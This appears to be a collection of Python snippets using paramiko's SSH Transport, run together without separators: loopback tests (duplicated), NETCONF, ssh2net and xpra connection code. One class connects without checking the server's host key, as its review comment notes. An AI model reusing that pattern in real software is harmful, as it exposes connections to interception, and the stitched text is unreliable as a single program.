        self.setup_test_server(connect_kwargs={})
        try:
            self.tc.request_port_forward('localhost', 1234)
        except SSHException as e:
            self.assertIn("forwarding request denied", str(e))
        else:
            self.fail("Did not raise SSHException!")
class TransportTest(ParamikoTest):
    """
    Loopback tests for Transport.

    ``self.tc`` (client) and ``self.ts`` (server) are Transports built on two
    LoopSocket objects linked to each other in setUp.
    """

    def setUp(self):
        self.socks = LoopSocket()
        self.sockc = LoopSocket()
        self.sockc.link(self.socks)
        self.tc = Transport(self.sockc)
        self.ts = Transport(self.socks)

    def tearDown(self):
        self.tc.close()
        self.ts.close()
        self.socks.close()
        self.sockc.close()

    def setup_test_server(self, client_options=None, server_options=None):
        """
        Start the server transport and connect the client to it.

        :param client_options: optional callable given the client's
            SecurityOptions before connecting.
        :param server_options: optional callable given the server's
            SecurityOptions before connecting.
        """
        host_key = RSAKey.from_private_key_file('tests/test_rsa.key')
        public_host_key = RSAKey(data=str(host_key))
        self.ts.add_server_key(host_key)

        if client_options is not None:
            client_options(self.tc.get_security_options())
        if server_options is not None:
            server_options(self.ts.get_security_options())

        event = threading.Event()
        self.server = NullServer()
        self.assertTrue(not event.is_set())
        self.ts.start_server(event, self.server)
        self.tc.connect(hostkey=public_host_key,
                        username='******', password='******')
        # The server sets ``event`` once negotiation finishes; allow 1 second.
        event.wait(1.0)
        self.assertTrue(event.is_set())
        self.assertTrue(self.ts.is_active())

    def test_1_security_options(self):
        o = self.tc.get_security_options()
        self.assertEqual(type(o), SecurityOptions)
        self.assertTrue(('aes256-cbc', 'blowfish-cbc') != o.ciphers)
        o.ciphers = ('aes256-cbc', 'blowfish-cbc')
        self.assertEqual(('aes256-cbc', 'blowfish-cbc'), o.ciphers)
        # An unknown cipher name must be rejected.
        try:
            o.ciphers = ('aes256-cbc', 'made-up-cipher')
            self.assertTrue(False)
        except ValueError:
            pass
        # A value that is not a sequence of names must be rejected.
        try:
            o.ciphers = 23
            self.assertTrue(False)
        except TypeError:
            pass

    def test_2_compute_key(self):
        # No ``L`` suffix: Python 2 promotes large literals to long anyway,
        # and the suffix is a syntax error on Python 3.
        self.tc.K = 123281095979686581523377256114209720774539068973101330872763622971399429481072519713536292772709507296759612401802191955568143056534122385270077606457721553469730659233569339356140085284052436697480759510519672848743794433460113118986816826624865291116513647975790797391795651716378444844877749505443714557929
        self.tc.H = unhexlify('0C8307CDE6856FF30BA93684EB0F04C2520E9ED3')
        self.tc.session_id = self.tc.H
        key = self.tc._compute_key('C', 32)
        self.assertEqual(
            '207E66594CA87C44ECCBA3B3CD39FDDB378E6FDB0F97C54B2AA0CFBF900CD995',
            hexlify(key).upper())

    def test_3_simple(self):
        """
        verify that we can establish an ssh link with ourselves across the
        loopback sockets.  this is hardly "simple" but it's simpler than the
        later tests. :)
        """
        host_key = RSAKey.from_private_key_file('tests/test_rsa.key')
        public_host_key = RSAKey(data=str(host_key))
        self.ts.add_server_key(host_key)
        event = threading.Event()
        server = NullServer()
        self.assertTrue(not event.is_set())
        self.assertEqual(None, self.tc.get_username())
        self.assertEqual(None, self.ts.get_username())
        self.assertEqual(False, self.tc.is_authenticated())
        self.assertEqual(False, self.ts.is_authenticated())
        self.ts.start_server(event, server)
        self.tc.connect(hostkey=public_host_key,
                        username='******', password='******')
        event.wait(1.0)
        self.assertTrue(event.is_set())
        self.assertTrue(self.ts.is_active())
        self.assertEqual('slowdive', self.tc.get_username())
        self.assertEqual('slowdive', self.ts.get_username())
        self.assertEqual(True, self.tc.is_authenticated())
        self.assertEqual(True, self.ts.is_authenticated())

    def test_3a_long_banner(self):
        """
        verify that a long banner doesn't mess up the handshake.
        """
        host_key = RSAKey.from_private_key_file('tests/test_rsa.key')
        public_host_key = RSAKey(data=str(host_key))
        self.ts.add_server_key(host_key)
        event = threading.Event()
        server = NullServer()
        self.assertTrue(not event.is_set())
        # Push the banner into the server side before the server starts.
        self.socks.send(LONG_BANNER)
        self.ts.start_server(event, server)
        self.tc.connect(hostkey=public_host_key,
                        username='******', password='******')
        event.wait(1.0)
        self.assertTrue(event.is_set())
        self.assertTrue(self.ts.is_active())

    def test_4_special(self):
        """
        verify that the client can demand odd handshake settings, and can
        renegotiate keys in mid-stream.
        """
        def force_algorithms(options):
            options.ciphers = ('aes256-cbc', )
            options.digests = ('hmac-md5-96', )
        self.setup_test_server(client_options=force_algorithms)
        self.assertEqual('aes256-cbc', self.tc.local_cipher)
        self.assertEqual('aes256-cbc', self.tc.remote_cipher)
        # hmac-md5-96 truncates the MAC to 96 bits == 12 bytes.
        self.assertEqual(12, self.tc.packetizer.get_mac_size_out())
        self.assertEqual(12, self.tc.packetizer.get_mac_size_in())

        self.tc.send_ignore(1024)
        self.tc.renegotiate_keys()
        self.ts.send_ignore(1024)

    def test_5_keepalive(self):
        """
        verify that the keepalive will be sent.
        """
        self.setup_test_server()
        self.assertEqual(None, getattr(self.server, '_global_request', None))
        self.tc.set_keepalive(1)
        time.sleep(2)
        self.assertEqual('*****@*****.**', self.server._global_request)

    def test_6_exec_command(self):
        """
        verify that exec_command() does something reasonable.
        """
        self.setup_test_server()

        chan = self.tc.open_session()
        schan = self.ts.accept(1.0)
        try:
            chan.exec_command('no')
            self.assertTrue(False)
        except SSHException:
            pass

        chan = self.tc.open_session()
        chan.exec_command('yes')
        schan = self.ts.accept(1.0)
        schan.send('Hello there.\n')
        schan.send_stderr('This is on stderr.\n')
        schan.close()

        f = chan.makefile()
        self.assertEqual('Hello there.\n', f.readline())
        self.assertEqual('', f.readline())
        f = chan.makefile_stderr()
        self.assertEqual('This is on stderr.\n', f.readline())
        self.assertEqual('', f.readline())

        # now try it with combined stdout/stderr
        chan = self.tc.open_session()
        chan.exec_command('yes')
        schan = self.ts.accept(1.0)
        schan.send('Hello there.\n')
        schan.send_stderr('This is on stderr.\n')
        schan.close()

        chan.set_combine_stderr(True)
        f = chan.makefile()
        self.assertEqual('Hello there.\n', f.readline())
        self.assertEqual('This is on stderr.\n', f.readline())
        self.assertEqual('', f.readline())
class sessionSSH:
    """
    SSH session from a manager to a NETCONF agent.

    The TCP connection is opened in ``__init__``.  Authentication and opening
    of the NETCONF subsystem channel happen in ``connect``.
    """

    def __init__(self, agent, user):
        """
        Read connection parameters and open the TCP socket to the agent.

        :param agent: object providing getIp(), getPublicKey(),
            getPublicKeyType() and getVersion() (IP version, 4 or 6).
        :param user: object providing getLogin(), getPrivateKeyFile(),
            getPrivateKeyType() and getPassword().
        :raises ValueError: if the agent's IP version is neither 4 nor 6.
        """
        self.hostname = agent.getIp()
        self.username = user.getLogin()
        self.publicKey = agent.getPublicKey()
        self.publicKeyType = agent.getPublicKeyType()
        self.version = agent.getVersion()
        self.privateKeyFile = user.getPrivateKeyFile()
        self.privateKeyType = user.getPrivateKeyType()
        self.password = user.getPassword()
        self.raw_data = ''

        # Choose the socket family (IPv4 or IPv6) from the agent's IP version.
        if self.version == 4:
            family = socket.AF_INET
        elif self.version == 6:
            family = socket.AF_INET6
        else:
            # Without this, no socket would be created and the connect below
            # would fail with an unrelated UnboundLocalError.
            raise ValueError("unsupported IP version: %r" % (self.version,))

        sock = socket.socket(family, socket.SOCK_STREAM)
        try:
            # Connect to the agent (the SSH handshake is done later, in connect()).
            sock.connect((self.hostname, C.NETCONF_SSH_PORT))
            # Create a new SSH session over the existing socket.
            self.ssh = Transport(sock)
        except Exception:
            # Do not leak the file descriptor when the connection fails.
            sock.close()
            raise
        self.i = 1

    def connect(self):
        """
        Authenticate to the agent and open the NETCONF subsystem.

        The agent is checked against its configured public key.  The user
        authenticates with a private key if one is configured, otherwise with
        a password.  On success the channel is stored in ``self.chan``.

        :returns: ``C.SUCCESS`` on success, ``C.FAILED`` on any error (the
            error text is written to syslog).
        """
        try:
            # Build a public key object from the server (agent) key.
            if self.publicKeyType == 'rsa':
                key_class = RSAKey
            elif self.publicKeyType == 'dss':
                key_class = DSSKey
            else:
                raise ValueError(
                    "unsupported agent public key type: %r" % (self.publicKeyType,))
            # b64decode exists on Python 2 and 3 (decodestring was removed in
            # Python 3.9); both ignore non-alphabet characters such as newlines.
            agent_public_key = key_class(data=base64.b64decode(self.publicKey))

            if self.privateKeyFile is not None:
                # Authenticate with the client (manager) private key.
                if self.privateKeyType == "rsa":
                    user_private_key = RSAKey.from_private_key_file(
                        self.privateKeyFile)
                elif self.privateKeyType == "dss":
                    user_private_key = DSSKey.from_private_key_file(
                        self.privateKeyFile)
                else:
                    raise ValueError(
                        "unsupported user private key type: %r" % (self.privateKeyType,))
                self.ssh.connect(hostkey=agent_public_key,
                                 username=self.username, pkey=user_private_key)
            else:
                # Authenticate with the client (manager) password.
                self.ssh.connect(hostkey=agent_public_key,
                                 username=self.username, password=self.password)

            # Request a new channel to the server, of type "session".
            self.chan = self.ssh.open_session()
            # Request a "netconf" subsystem on the server.
            self.chan.invoke_subsystem(C.NETCONF_SSH_SUBSYSTEM)
        except Exception as exp:
            syslog.openlog("YencaP Manager")
            syslog.syslog(syslog.LOG_ERR, str(exp))
            syslog.closelog()
            return C.FAILED
        return C.SUCCESS
class TransportTest(ParamikoTest):
    """Loopback tests for paramiko's Transport.

    ``tc`` (client) and ``ts`` (server) are Transports over two linked
    LoopSockets, so the whole SSH exchange happens in-process.
    """

    def setUp(self):
        self.socks = LoopSocket()
        self.sockc = LoopSocket()
        self.sockc.link(self.socks)
        self.tc = Transport(self.sockc)
        self.ts = Transport(self.socks)

    def tearDown(self):
        self.tc.close()
        self.ts.close()
        self.socks.close()
        self.sockc.close()

    def setup_test_server(self, client_options=None, server_options=None):
        """Start ``ts`` with a NullServer and connect/authenticate ``tc`` to it.

        Args:
            client_options: optional callable applied to the client's
                SecurityOptions before connecting.
            server_options: optional callable applied to the server's
                SecurityOptions before it starts.
        """
        host_key = RSAKey.from_private_key_file('tests/test_rsa.key')
        public_host_key = RSAKey(data=str(host_key))
        self.ts.add_server_key(host_key)

        if client_options is not None:
            client_options(self.tc.get_security_options())
        if server_options is not None:
            server_options(self.ts.get_security_options())

        event = threading.Event()
        self.server = NullServer()
        self.assertFalse(event.is_set())
        self.ts.start_server(event, self.server)
        self.tc.connect(hostkey=public_host_key,
                        username='******', password='******')
        event.wait(1.0)
        self.assertTrue(event.is_set())
        self.assertTrue(self.ts.is_active())

    def test_1_security_options(self):
        o = self.tc.get_security_options()
        self.assertEqual(type(o), SecurityOptions)
        self.assertNotEqual(('aes256-cbc', 'blowfish-cbc'), o.ciphers)
        o.ciphers = ('aes256-cbc', 'blowfish-cbc')
        self.assertEqual(('aes256-cbc', 'blowfish-cbc'), o.ciphers)
        # Unknown cipher names and non-sequence values must be rejected.
        with self.assertRaises(ValueError):
            o.ciphers = ('aes256-cbc', 'made-up-cipher')
        with self.assertRaises(TypeError):
            o.ciphers = 23

    def test_2_compute_key(self):
        # A literal this large is already a long on Python 2 and an int on
        # Python 3, so no long() call is needed.
        self.tc.K = 123281095979686581523377256114209720774539068973101330872763622971399429481072519713536292772709507296759612401802191955568143056534122385270077606457721553469730659233569339356140085284052436697480759510519672848743794433460113118986816826624865291116513647975790797391795651716378444844877749505443714557929
        self.tc.H = unhexlify('0C8307CDE6856FF30BA93684EB0F04C2520E9ED3')
        self.tc.session_id = self.tc.H
        key = self.tc._compute_key('C', 32)
        self.assertEqual('207E66594CA87C44ECCBA3B3CD39FDDB378E6FDB0F97C54B2AA0CFBF900CD995',
                         hexlify(key).upper())

    def test_3_simple(self):
        """
        verify that we can establish an ssh link with ourselves across the
        loopback sockets.  this is hardly "simple" but it's simpler than the
        later tests. :)
        """
        host_key = RSAKey.from_private_key_file('tests/test_rsa.key')
        public_host_key = RSAKey(data=str(host_key))
        self.ts.add_server_key(host_key)
        event = threading.Event()
        server = NullServer()
        self.assertFalse(event.is_set())
        self.assertEqual(None, self.tc.get_username())
        self.assertEqual(None, self.ts.get_username())
        self.assertEqual(False, self.tc.is_authenticated())
        self.assertEqual(False, self.ts.is_authenticated())
        self.ts.start_server(event, server)
        self.tc.connect(hostkey=public_host_key,
                        username='******', password='******')
        event.wait(1.0)
        self.assertTrue(event.is_set())
        self.assertTrue(self.ts.is_active())
        self.assertEqual('slowdive', self.tc.get_username())
        self.assertEqual('slowdive', self.ts.get_username())
        self.assertEqual(True, self.tc.is_authenticated())
        self.assertEqual(True, self.ts.is_authenticated())

    def test_3a_long_banner(self):
        """
        verify that a long banner doesn't mess up the handshake.
        """
        host_key = RSAKey.from_private_key_file('tests/test_rsa.key')
        public_host_key = RSAKey(data=str(host_key))
        self.ts.add_server_key(host_key)
        event = threading.Event()
        server = NullServer()
        self.assertFalse(event.is_set())
        self.socks.send(LONG_BANNER)
        self.ts.start_server(event, server)
        self.tc.connect(hostkey=public_host_key,
                        username='******', password='******')
        event.wait(1.0)
        self.assertTrue(event.is_set())
        self.assertTrue(self.ts.is_active())

    def test_4_special(self):
        """
        verify that the client can demand odd handshake settings, and can
        renegotiate keys in mid-stream.
        """
        def force_algorithms(options):
            options.ciphers = ('aes256-cbc',)
            options.digests = ('hmac-md5-96',)
        self.setup_test_server(client_options=force_algorithms)
        self.assertEqual('aes256-cbc', self.tc.local_cipher)
        self.assertEqual('aes256-cbc', self.tc.remote_cipher)
        self.assertEqual(12, self.tc.packetizer.get_mac_size_out())
        self.assertEqual(12, self.tc.packetizer.get_mac_size_in())

        self.tc.send_ignore(1024)
        self.tc.renegotiate_keys()
        self.ts.send_ignore(1024)

    def test_5_keepalive(self):
        """
        verify that the keepalive will be sent.
        """
        self.setup_test_server()
        self.assertEqual(None, getattr(self.server, '_global_request', None))
        self.tc.set_keepalive(1)
        time.sleep(2)
        self.assertEqual('*****@*****.**', self.server._global_request)

    def test_6_exec_command(self):
        """
        verify that exec_command() does something reasonable.
        """
        self.setup_test_server()

        chan = self.tc.open_session()
        schan = self.ts.accept(1.0)
        # exec_command('no') is expected to be refused.
        with self.assertRaises(SSHException):
            chan.exec_command('no')

        chan = self.tc.open_session()
        chan.exec_command('yes')
        schan = self.ts.accept(1.0)
        schan.send('Hello there.\n')
        schan.send_stderr('This is on stderr.\n')
        schan.close()

        f = chan.makefile()
        self.assertEqual('Hello there.\n', f.readline())
        self.assertEqual('', f.readline())
        f = chan.makefile_stderr()
        self.assertEqual('This is on stderr.\n', f.readline())
        self.assertEqual('', f.readline())

        # now try it with combined stdout/stderr
        chan = self.tc.open_session()
        chan.exec_command('yes')
        schan = self.ts.accept(1.0)
        schan.send('Hello there.\n')
        schan.send_stderr('This is on stderr.\n')
        schan.close()

        chan.set_combine_stderr(True)
        f = chan.makefile()
        self.assertEqual('Hello there.\n', f.readline())
        self.assertEqual('This is on stderr.\n', f.readline())
        self.assertEqual('', f.readline())
class SSH2NetSessionParamiko:
    def __init__(self, p_self):
        """
        Initialize SSH2NetSessionParamiko Object

        This object, through composition, allows for using Paramiko as the underlying "driver"
        for SSH2Net instead of the default "ssh2-python". Paramiko will be ever so slightly
        slower but as you will most likely be I/O constrained it shouldn't matter!

        "ssh2-python" as of 20 October 2019 has a bug preventing keyboard interactive
        authentication from working as desired; this is the reason Paramiko is in here now!

        Args:
            p_self: SSH2Net object

        Returns:
            N/A  # noqa

        Raises:
            N/A  # noqa

        """
        # Share the parent's attribute dict so state written here is visible to
        # the SSH2Net object and vice versa.
        self.__dict__ = p_self.__dict__
        # These are methods on the parent's class (not in its __dict__), so they
        # must be bound explicitly to reach the parent implementation.
        self._session_alive = p_self._session_alive
        self._session_open = p_self._session_open
        self._channel_alive = p_self._channel_alive

    def _session_open_connect(self) -> None:
        """
        Perform session handshake for paramiko (instead of default ssh2-python)

        Args:
            N/A  # noqa

        Returns:
            N/A  # noqa

        Raises:
            RequirementsNotSatisfied: if paramiko is not installed
            Exception: catch all for unknown exceptions during session handshake

        """
        try:
            from paramiko import Transport  # noqa
        except ModuleNotFoundError as exc:
            err = f"Module '{exc.name}' not installed!"
            msg = f"***** {err} {'*' * (80 - len(err))}"
            fix = (
                f"To resolve this issue, install '{exc.name}'. You can do this in one of the "
                "following ways:\n"
                "1: 'pip install -r requirements-paramiko.txt'\n"
                "2: 'pip install ssh2net[paramiko]'"
            )
            warning = "\n" + msg + "\n" + fix + "\n" + msg
            warnings.warn(warning)
            # Chain the original ImportError so the missing module stays visible.
            raise RequirementsNotSatisfied from exc
        try:
            self.session = Transport(self.sock)
            self.session.start_client()
            # Give the paramiko Transport the ssh2-python style set_timeout(ms).
            self.session.set_timeout = self._set_timeout
        except Exception as exc:
            logging.critical(
                f"Failed to complete handshake with host {self.host}; " f"Exception: {exc}"
            )
            raise

    def _session_public_key_auth(self) -> None:
        """
        Perform public key based auth on SSH2NetSession

        An AuthenticationException is only logged (not raised); any other
        exception is logged and re-raised.

        Args:
            N/A  # noqa

        Returns:
            N/A  # noqa

        Raises:
            Exception: catch all for unhandled exceptions

        """
        try:
            self.session.auth_publickey(self.auth_user, self.auth_public_key)
        except AuthenticationException:
            logging.critical(f"Public key authentication with host {self.host} failed.")
        except Exception as exc:
            logging.critical(
                "Unknown error occurred during public key authentication with host "
                f"{self.host}; Exception: {exc}"
            )
            raise

    def _session_password_auth(self) -> None:
        """
        Perform password or keyboard interactive based auth on SSH2NetSession

        Args:
            N/A  # noqa

        Returns:
            N/A  # noqa

        Raises:
            AuthenticationFailed: if authentication fails
            Exception: catch all for unknown other exceptions

        """
        try:
            self.session.auth_password(self.auth_user, self.auth_password)
        except AuthenticationException as exc:
            logging.critical(
                f"Password authentication with host {self.host} failed. Exception: {exc}."
                "\n\tNote: Paramiko automatically attempts both standard auth as well as keyboard "
                "interactive auth. Paramiko exception about bad auth type may be misleading!"
            )
            raise AuthenticationFailed
        except Exception as exc:
            logging.critical(
                "Unknown error occurred during password authentication with host "
                f"{self.host}; Exception: {exc}"
            )
            raise

    def _channel_open_driver(self) -> None:
        """
        Open channel and request a pty on it

        Args:
            N/A  # noqa

        Returns:
            N/A  # noqa

        Raises:
            N/A  # noqa

        """
        self.channel = self.session.open_session()
        self.channel.get_pty()
        logging.debug(f"Channel to host {self.host} opened")

    def _channel_invoke_shell(self) -> None:
        """
        Invoke shell on channel

        Additionally, this "re-points" some ssh2net method calls to the appropriate paramiko
        methods. This happens as ssh2net is primarily built on "ssh2-python" and there is not
        full parity between paramiko/ssh2-python.

        Args:
            N/A  # noqa

        Returns:
            N/A  # noqa

        Raises:
            N/A  # noqa

        """
        self._shell = True
        self.channel.invoke_shell()
        self.channel.read = self._paramiko_read_channel
        self.channel.write = self.channel.sendall
        self.session.set_blocking = self._set_blocking
        self.channel.flush = self._flush

    def _paramiko_read_channel(self):
        """
        Patch channel.read method for paramiko driver

        "ssh2-python" returns a tuple of bytes and data, "paramiko" simply returns the data from
        the channel, patch this for parity with "ssh2-python".

        Args:
            N/A  # noqa

        Returns:
            tuple: (None, up to 1024 bytes read from the channel)

        Raises:
            N/A  # noqa

        """
        channel_read = self.channel.recv(1024)
        return None, channel_read

    def _flush(self):
        """
        Patch a "flush" method for paramiko driver

        Drains whatever is readable (polling every 10ms) and, once nothing is
        ready, sends a single newline and returns.

        Need to investigate this further for two things:
            1) is "flush" even necessary when using ssh2-python driver?
            2) if it is necessary, is there a combination of reads/writes that would implement
               this in a sane fashion for paramiko

        Args:
            N/A  # noqa

        Returns:
            N/A  # noqa

        Raises:
            N/A  # noqa

        """
        while True:
            time.sleep(0.01)
            if self.channel.recv_ready():
                self._paramiko_read_channel()
            else:
                self.channel.write("\n")
                return

    def _set_blocking(self, blocking):
        """
        Set channel blocking mode, then re-apply the session timeout

        The timeout is re-applied because paramiko appears to reset it to 0
        when switching to non-blocking mode.

        Args:
            blocking: True/False, passed to paramiko's Channel.setblocking

        Returns:
            N/A  # noqa

        Raises:
            N/A  # noqa

        """
        self.channel.setblocking(blocking)
        # ssh2net timeouts are milliseconds; paramiko expects seconds
        self.channel.settimeout(self.session_timeout / 1000)

    def _set_timeout(self, timeout):
        """
        Set channel timeout, converting ssh2net milliseconds to paramiko seconds

        NOTE(review): for paramiko, a timeout of 0 means non-blocking; confirm
        callers never pass 0 intending "no timeout" (the ssh2-python meaning).

        Args:
            timeout: timeout in milliseconds

        Returns:
            N/A  # noqa

        Raises:
            N/A  # noqa

        """
        self.channel.settimeout(timeout / 1000)
class ParamikoSshConnection(BaseSshConnection):
    """Interactive SSH shell connection implemented with paramiko."""

    def connect(self, wait_prompt=True):
        """Open the TCP socket, authenticate and start an interactive shell.

        Password auth is used when ``self.password`` is set; otherwise the
        private key file is loaded as DSA when ``key_algorithm`` equals
        ``DSA_KEY_ALGORITHM`` and as RSA in every other case.  If any step
        fails, the transport and socket are closed before re-raising.

        Args:
            wait_prompt: when True, block in :meth:`receive` until the prompt
                regex matches.
        """
        sock = socket(AF_INET, SOCK_STREAM)
        self.socket = sock
        session = None
        try:
            sock.connect((self.hostname, self.port))
            session = Transport(sock)
            self.session = session
            session.start_client()
            # NOTE(review): the server host key is never verified here.
            if self.password is not None:
                session.auth_password(self.username, self.password)
            else:
                key_class = (
                    DSSKey if self.key_algorithm == DSA_KEY_ALGORITHM else RSAKey
                )
                key = key_class.from_private_key_file(
                    self.private_key_file, self.key_passphrase
                )
                session.auth_publickey(self.username, key)
            self.channel = session.open_session()
            self.channel.get_pty()
            self.channel.invoke_shell()
        except Exception:
            # Don't leave a half-open transport thread / socket behind.
            if session is not None:
                session.close()
            sock.close()
            raise
        if wait_prompt:
            self.receive()

    @property
    def connected(self):
        """True when the socket is open and a session and channel exist."""
        return bool(
            self.socket and not self.socket._closed and self.session and self.channel
        )

    def send(self, line, socket_timeout=None):
        """Send ``line`` followed by a newline on the channel.

        Args:
            line: text to send.
            socket_timeout: channel timeout in seconds; defaults to
                ``self.socket_timeout``.

        Returns:
            The result of ``channel.sendall`` (paramiko's sendall returns None).
        """
        socket_timeout = (
            socket_timeout if socket_timeout is not None else self.socket_timeout
        )
        self.channel.settimeout(socket_timeout)
        size = self.channel.sendall(line + "\n")
        return size

    def receive(
        self, regex=None, socket_timeout=None, timeout=None, buffer_size=None
    ):
        """Read from the channel until ``regex`` matches the accumulated output.

        Args:
            regex: compiled pattern marking the end of output; defaults to
                ``self.prompt_regex``.
            socket_timeout: per-read channel timeout in seconds; defaults to
                ``self.socket_timeout``.
            timeout: overall deadline in seconds (None = no deadline);
                defaults to ``self.timeout``.
            buffer_size: maximum bytes per ``recv``; defaults to
                ``self.buffer_size``.

        Returns:
            The sanitized, UTF-8 decoded output.

        Raises:
            SocketTimeoutException: a read returned no data before a match.
            ReceiveTimeoutException: ``timeout`` elapsed without a match.
            UnicodeDecodeError: the received bytes are not valid UTF-8.

        NOTE(review): paramiko's Channel.recv raises socket.timeout itself when
        ``socket_timeout`` elapses; that exception propagates unchanged.
        """
        from codecs import getincrementaldecoder

        regex = regex if regex is not None else self.prompt_regex
        socket_timeout = (
            socket_timeout if socket_timeout is not None else self.socket_timeout
        )
        timeout = timeout if timeout is not None else self.timeout
        buffer_size = buffer_size if buffer_size is not None else self.buffer_size

        assert regex is not None
        assert socket_timeout is None or isinstance(socket_timeout, (int, float))
        assert timeout is None or isinstance(timeout, (int, float))
        assert isinstance(buffer_size, int) and buffer_size > 0

        self.channel.settimeout(socket_timeout)
        # Decode incrementally: a multi-byte UTF-8 character split across two
        # recv() chunks would make a per-chunk .decode() raise.
        decoder = getincrementaldecoder("utf-8")()
        start = time()
        chunk = self.channel.recv(buffer_size)
        # size is the raw byte count: an empty read means EOF/no data, even if
        # the decoder is still holding a partial character.
        size = len(chunk)
        output = decoder.decode(chunk)
        LOG.debug(output)
        duration = time() - start
        while (
            not regex.search(output)
            and (timeout is None or duration < timeout)
            and size > 0
        ):
            chunk = self.channel.recv(buffer_size)
            size = len(chunk)
            data = decoder.decode(chunk)
            LOG.debug(data)
            output += data
            duration = time() - start

        # Only report a failure when the prompt was not found; a match on the
        # very read that crossed the deadline is still a success.
        if not regex.search(output):
            if not size:
                raise SocketTimeoutException(
                    output, socket_timeout, duration, regex.pattern
                )
            if timeout is not None and duration >= timeout:
                raise ReceiveTimeoutException(
                    output, timeout, duration, regex.pattern
                )
        # Flush the decoder; raises if the stream ended mid-character.
        output += decoder.decode(b"", final=True)
        return self.sanitize(output)

    def disconnect(self):
        """Close the channel, then the transport, then the socket."""
        if self.channel:
            self.channel.close()
        if self.session:
            self.session.close()
        if self.socket:
            self.socket.close()
def do_ssh_paramiko_connect_to(sock, host, port, username, password, proxy_command, remote_xpra, socket_dir, display_as_args, target):
    """Open an SSH connection over ``sock`` with paramiko and start a remote xpra proxy.

    Steps:
      1. negotiate the SSH transport;
      2. when VERIFY_HOSTKEY is set, check the server host key against the
         known_hosts files, asking the user (confirm_key) about changed or
         unknown keys and optionally recording the key (ADD_KEY);
      3. authenticate with the enabled methods (none, password, agent, key
         files, interactive password prompts);
      4. find the first command in ``remote_xpra`` for which ``which``
         succeeds and run it with ``proxy_command`` on a new session channel.

    Returns:
        SSHSocketConnection wrapping the channel running the remote command.

    Raises:
        InitException: on negotiation, authentication or session failures.
        InitExit: when a changed/unknown host key is rejected.
        Exception: when every command in ``remote_xpra`` fails the ``which`` test.
    """
    from paramiko import SSHException, Transport, Agent, RSAKey, DSSKey, PasswordRequiredException
    from paramiko.hostkeys import HostKeys
    transport = Transport(sock)
    transport.use_compression(False)
    log("SSH transport %s", transport)
    try:
        transport.start_client()
    except SSHException as e:
        log("start_client()", exc_info=True)
        raise InitException("SSH negotiation failed: %s" % e)

    host_key = transport.get_remote_server_key()
    assert host_key, "no remote server key"
    log("remote_server_key=%s", keymd5(host_key))
    if VERIFY_HOSTKEY:
        host_keys = HostKeys()
        host_keys_filename = None
        KNOWN_HOSTS = get_ssh_known_hosts_files()
        # use the first known_hosts file that exists and loads successfully
        for known_hosts in KNOWN_HOSTS:
            host_keys.clear()
            try:
                path = os.path.expanduser(known_hosts)
                if os.path.exists(path):
                    host_keys.load(path)
                    log("HostKeys.load(%s) successful", path)
                    host_keys_filename = path
                    break
            except IOError:
                log("HostKeys.load(%s)", known_hosts, exc_info=True)

        log("host keys=%s", host_keys)
        keys = host_keys.lookup(host)
        known_host_key = (keys or {}).get(host_key.get_name())

        def keyname():
            return host_key.get_name().replace("ssh-", "")

        if host_key == known_host_key:
            assert host_key
            log("%s host key '%s' OK for host '%s'", keyname(), keymd5(host_key), host)
        else:
            if known_host_key:
                log.warn("Warning: SSH server key mismatch")
                qinfo = [
                    "WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!",
                    "IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!",
                    "Someone could be eavesdropping on you right now (man-in-the-middle attack)!",
                    "It is also possible that a host key has just been changed.",
                    "The fingerprint for the %s key sent by the remote host is" % keyname(),
                    keymd5(host_key),
                ]
                if VERIFY_STRICT:
                    log.warn("Host key verification failed.")
                    #TODO: show alert with no option to accept key
                    qinfo += [
                        "Please contact your system administrator.",
                        "Add correct host key in %s to get rid of this message." % host_keys_filename,
                        "Offending %s key in %s" % (keyname(), host_keys_filename),
                        "%s host key for %s has changed and you have requested strict checking." % (keyname(), host),
                    ]
                    sys.stderr.write(os.linesep.join(qinfo))
                    transport.close()
                    raise InitExit(EXIT_SSH_KEY_FAILURE, "SSH Host key has changed")
                if not confirm_key(qinfo):
                    transport.close()
                    raise InitExit(EXIT_SSH_KEY_FAILURE, "SSH Host key has changed")
            else:
                assert (not keys) or (host_key.get_name() not in keys)
                if not keys:
                    log.warn("Warning: unknown SSH host")
                else:
                    log.warn("Warning: unknown %s SSH host key", keyname())
                qinfo = [
                    "The authenticity of host '%s' can't be established." % (host,),
                    "%s key fingerprint is" % keyname(),
                    keymd5(host_key),
                ]
                if not confirm_key(qinfo):
                    transport.close()
                    raise InitExit(EXIT_SSH_KEY_FAILURE, "Unknown SSH host '%s'" % host)

            if ADD_KEY:
                try:
                    if not host_keys_filename:
                        #the first one is the default,
                        #ie: ~/.ssh/known_hosts on posix
                        host_keys_filename = os.path.expanduser(KNOWN_HOSTS[0])
                    log("adding %s key for host '%s' to '%s'", keyname(), host, host_keys_filename)
                    if not os.path.exists(host_keys_filename):
                        keys_dir = os.path.dirname(host_keys_filename)
                        if not os.path.exists(keys_dir):
                            log("creating keys directory '%s'", keys_dir)
                            os.mkdir(keys_dir, 0o700)
                        elif not os.path.isdir(keys_dir):
                            log.warn("Warning: '%s' is not a directory", keys_dir)
                            log.warn(" key not saved")
                        if os.path.exists(keys_dir) and os.path.isdir(keys_dir):
                            log("creating known host file '%s'", host_keys_filename)
                            # create the file with 0644 permissions
                            with umask_context(0o133):
                                with open(host_keys_filename, 'a+'):
                                    pass
                    host_keys.add(host, host_key.get_name(), host_key)
                    host_keys.save(host_keys_filename)
                except OSError as e:
                    log("failed to add key to '%s'", host_keys_filename)
                    log.error("Error adding key to '%s'", host_keys_filename)
                    log.error(" %s", e)
                except Exception:
                    log.error("cannot add key", exc_info=True)

    def auth_agent():
        agent = Agent()
        agent_keys = agent.get_keys()
        log("agent keys: %s", agent_keys)
        if agent_keys:
            for agent_key in agent_keys:
                log("trying ssh-agent key '%s'", keymd5(agent_key))
                try:
                    transport.auth_publickey(username, agent_key)
                    if transport.is_authenticated():
                        log("authenticated using agent and key '%s'", keymd5(agent_key))
                        break
                except SSHException:
                    log("agent key '%s' rejected", keymd5(agent_key), exc_info=True)
            if not transport.is_authenticated():
                log.info("agent authentication failed, tried %i key%s", len(agent_keys), engs(agent_keys))

    def auth_publickey():
        log("trying public key authentication")
        # each default key file must be parsed with its matching key class:
        # loading id_dsa with RSAKey always fails
        for keyfile, key_class in (("id_rsa", RSAKey), ("id_dsa", DSSKey)):
            keyfile_path = osexpand(os.path.join("~/", ".ssh", keyfile))
            if not os.path.exists(keyfile_path):
                log("no keyfile at '%s'", keyfile_path)
                continue
